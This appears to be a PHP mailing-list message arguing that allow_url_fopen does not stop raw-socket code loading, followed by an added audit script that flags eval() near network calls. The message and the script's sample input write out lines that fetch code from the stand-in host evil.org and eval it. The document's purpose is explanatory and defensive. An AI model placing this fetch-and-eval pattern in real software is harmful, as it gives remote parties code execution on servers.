sure:  eval('file_get_contents("http://evil.org");');

Ok, but there is nothing (allow_url_fopen does not work here) preventing me from doing similar via:

$fp = fsockopen("evil.org", 80);
fwrite($fp, "GET /evil_code.txt HTTP/1.0\r\nHost: evil.org\r\n\r\n");
eval(stream_get_contents($fp));

Ilia

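The point made in the message above, turned into a defender's source check (an added example, not part of the original post or of PHP itself): since `allow_url_fopen` does not cover raw sockets, an audit has to look for `eval` alongside any network call. The function list, the `audit_source` helper and the sample input are assumptions constructed for illustration.

```php
<?php
// Added audit sketch: report eval() and raw network calls found in PHP source.
// Assumed list of non-wrapper network functions; extend for your code base.
const NETWORK_FUNCS = ['fsockopen', 'pfsockopen', 'stream_socket_client',
                       'socket_connect', 'curl_exec'];

function audit_source(string $code): array
{
    $findings = [];
    $tokens = token_get_all($code);
    $count = count($tokens);
    for ($i = 0; $i < $count; $i++) {
        if (!is_array($tokens[$i])) {
            continue; // single-character tokens such as "(" or ";"
        }
        [$id, $text, $line] = $tokens[$i];
        $name = strtolower(ltrim($text, '\\'));
        if ($id === T_EVAL) {
            $findings[] = ['line' => $line, 'kind' => 'eval', 'name' => 'eval'];
        } elseif (in_array(token_name($id), ['T_STRING', 'T_NAME_FULLY_QUALIFIED'], true)
            && in_array($name, NETWORK_FUNCS, true)) {
            // Skip whitespace and require "(" so only calls are reported.
            $j = $i + 1;
            while ($j < $count && is_array($tokens[$j]) && $tokens[$j][0] === T_WHITESPACE) {
                $j++;
            }
            if ($j < $count && $tokens[$j] === '(') {
                $findings[] = ['line' => $line, 'kind' => 'network', 'name' => $name];
            }
        }
    }
    return $findings;
}

// Constructed sample input: the socket-based pattern from the message above.
$sample = <<<'SRC'
<?php
$fp = fsockopen("evil.org", 80);
fwrite($fp, "GET /evil_code.txt HTTP/1.0\r\nHost: evil.org\r\n\r\n");
eval(stream_get_contents($fp));
SRC;

$findings = audit_source($sample);
foreach ($findings as $f) {
    printf("line %d: %s (%s)\n", $f['line'], $f['name'], $f['kind']);
}
$kinds = array_column($findings, 'kind');
if (in_array('eval', $kinds, true) && in_array('network', $kinds, true)) {
    echo "REVIEW: eval() and a raw network call appear in the same file\n";
}
```

The check works on tokens, so names inside strings and comments are ignored; method calls that share a name with a listed function are still reported and need manual triage.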